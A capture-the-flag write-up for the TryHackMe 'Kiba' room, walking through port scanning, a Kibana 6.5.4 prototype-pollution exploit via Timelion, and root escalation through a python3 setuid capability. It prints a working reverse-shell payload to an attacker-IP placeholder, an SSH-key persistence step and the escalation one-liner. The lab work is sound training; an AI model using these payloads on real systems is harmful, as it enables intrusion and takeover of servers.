THM kiba Link

Kiba CTF WriteUp

by Zebra

Tasks

Introduction

Hello and welcome to the write-up of the room “Kiba” on tryhackme.
Kiba is a room marked as easy and in my opinion its also an easy one. We will start as always do with an nmap scan and web enumeration. The nmap scan of the “standard” port only show a webserver only with a hint for an escalation path. We had to scan all ports to find the right webserver with an application called “kiba”. An exploit with an reverse shell give us access to the server and the opportunity to escalate to root.

So let’s begin:

Preparation Steps

1 2 3 4 5 6 7 8

mkdir kiba #New Room folder cd kiba #Move into folder mkdir nmap #Nmap directory mkdir gobuster #Gobuster directory sudo nano /etc/hosts #$ip kiba.thm export target=10.10.10.10 export golist=/usr/share/seclists/Discovery/Web-Content/common.txt export rockyou=/usr/share/wordlists/rockyou.txt

Scanning and Enumeration

Lets begin with a standard nmap scan for common ports. After that check all ports for don’t let a port pass out of our attention.

Nmap Scan

1. Nmap initial scan
2. Nmap all ports check
3. If necessary fire up a all port scan.

1
2
3
4
5
6
7
8
9
10
11
12
13

$nmap -sC -sV -oN ./nmap/initial kiba.thm

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 9d:f8:d1:57:13:24:81:b6:18:5d:04:8e:d2:38:4f:90 (RSA)
|   256 e1:e6:7a:a1:a1:1c:be:03:d2:4e:27:1b:0d:0a:ec:b1 (ECDSA)
|_  256 2a:ba:e5:c5:fb:51:38:17:45:e7:b1:54:ca:a1:a3:fc (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesnt have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel.

#-sC = Scan with default NSE scripts.
#-sV = Attempts to determine the version of the service running on port.
#-oN = Normal output to the file.

the all port show two ports more.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

$ nmap -Pn -p- -oN ./nmap/all_ports kiba.thm
$ nmap -sC -sV -p- -oN ./nmap/all_initial kiba.thm

PORT     STATE SERVICE      VERSION
22/tcp   open  ssh          OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 9d:f8:d1:57:13:24:81:b6:18:5d:04:8e:d2:38:4f:90 (RSA)
|   256 e1:e6:7a:a1:a1:1c:be:03:d2:4e:27:1b:0d:0a:ec:b1 (ECDSA)
|_  256 2a:ba:e5:c5:fb:51:38:17:45:e7:b1:54:ca:a1:a3:fc (ED25519)
80/tcp   open  http         Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesnt have a title (text/html).
5044/tcp open  lxi-evntsvc?
5601/tcp open  esmagent?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe: 
|     kbn-name: kibana
|   GetRequest: 
|     HTTP/1.1 302 Found
|     location: /app/kibana
|     kbn-name: kibana
|     HTTP/1.1 404 Not Found
|     kbn-name: kibana

Web Enumeration

Visit web-pages Port 80:

Firefox: kiba.thm on Port 80

We only find a hint for “linux capabilities”. So lets note this.

Web directory enumeration:

We could use one of our preferred tools like dirbuster, gobuster or dirsearch. I will use gobuster this time.

Gobuster scan:

gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -o ./web/gobuser_initial

Nothing really interesting.

Visit and enumerate webpage on Port 5601:

Firefox: http://kiba.thm:5601/ -> Redirect to http://kiba.thm:5601/app/kibana#/home?_g=()

gobuster dir -u http://10.10.10.10:5601/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -o ./web/5601_initial

Nothing helpful. Manual page enumeration.

Manual enumeration:

Click on the left side through the tasks. At the management Task we find the Version of Kibana.

Then we go over to google and check kibana for exploits. So enter in google kibana 6.5.4 prototype-based inheritance and kibana 6.5.4 exploit. We will find the answers for Task 1.1, 1.2 and 1.3.

### Task 1.1, 1.2 and 1.3 solved ###

Exploitation of Kiba:

With our google results we get infos on tenable.com and github. I prefer github so let have a look to the exploit.

To get the exploit running do the following steps:

• Open a listener with rlwrap nc -lvnp 6666
• Open Kibana
• Past one of the following payload into the timelion visualizer
• Click run
• On the left panel click on Canvas
• Your reverse shell should pop ! :)

The following line get my reverse shell running:

1
2

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/<yourip>/6666 0>&1\'");//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

-> The reverse shell should connect and we could start the user enumeration.

System enumeration

The get a stable connection i will get a ssh connection running.

@ local:

• generate a ssh keygen with ssh-keygen and check with enter.
• chmod 600 id_rsa
• cat id_rsa.pub

@ kiba:

´´´sh cd /home/kibana mkdir .ssh cd .ssh echo “id_rsa.pub output” > authorized_keys```

@ local: ssh -i id_rsa kiba@10.10.10.10

Kibana enumeration (user.txt):

Find user.txt. Go to kibana’s home folder an cat the user.txt. If you don’t find the user.txt use locate user.txt.

### Task 1.4 solved ###

Privilege escalation:

First we do some manual enumeration with the following commands:

Check for users: cat /etc/passwd | grep home -> Only user with home directory is kiba

Check cronjobs: cat /etc/crontab

1
2
3
4
5
6
7
8
9
10
11
12

cat /etc/crontab
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*  *	* * *	root	cd /root/ufw && bash ufw.sh
*  *	* * *	kiba	cd /home/kiba/kibana/bin && bash kibana

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

ls -la /home/kiba/kibana/bin/kibana
-rwxr-xr-x 1 kiba kiba 632 Dec 17  2018 /home/kiba/kibana/bin/kibana
kiba@ubuntu:~$ cat /home/kiba/kibana/bin/kibana
#!/bin/sh
SCRIPT=$0

# SCRIPT may be an arbitrarily deep series of symlinks. Loop until we have the concrete path.
while [ -h "$SCRIPT" ] ; do
  ls=$(ls -ld "$SCRIPT")
  # Drop everything prior to ->
  link=$(expr "$ls" : '.*-> \(.*\)$')
  if expr "$link" : '/.*' > /dev/null; then
    SCRIPT="$link"
  else
    SCRIPT=$(dirname "$SCRIPT")/"$link"
  fi
done

DIR="$(dirname "${SCRIPT}")/.."
NODE="${DIR}/node/bin/node"
test -x "$NODE" || NODE=$(which node)
if [ ! -x "$NODE" ]; then
  echo "unable to find usable node.js executable."
  exit 1
fi

NODE_ENV=production exec "${NODE}" $NODE_OPTIONS --no-warnings "${DIR}/src/cli" ${@}

-> Nothing useful here, cause we could not escalate through the root script without write permissions.

Check for SUID binaries: find / -type f -perm -04000 -ls 2>/dev/null -> Nothing interesting there.

Check for “linux capabilities” (hint from webserver):

1
2
3
4
5
6

getcap -r / 2>/dev/null
/home/kiba/.hackmeplease/python3 = cap_setuid+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep

### Task 1.5 and 1.6 solved ###

Final step to root

We find our way to go. Use the linux capabilities. Here you will find a link to an explanation by hacktricks. To escalate with python we will use GTFObins() for the escalation command.

1
2
3
4
5
6
7
8
9
10
11

getcap -r / 2>/dev/null
/home/kiba/.hackmeplease/python3 = cap_setuid+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep
kiba@ubuntu:~$ /home/kiba/.hackmeplease/python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
# id
uid=0(root) gid=1000(kiba) groups=1000(kiba),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)
# bash -i
root@ubuntu:~# wc -c /root/root.txt
45 /root/root.txt

### Task 1.7 solved ###

What we learned:

1. All port scanning with nmap.
2. Get information’s and an exploit to an unknown service.
3. Escalate via linux capabilities to root.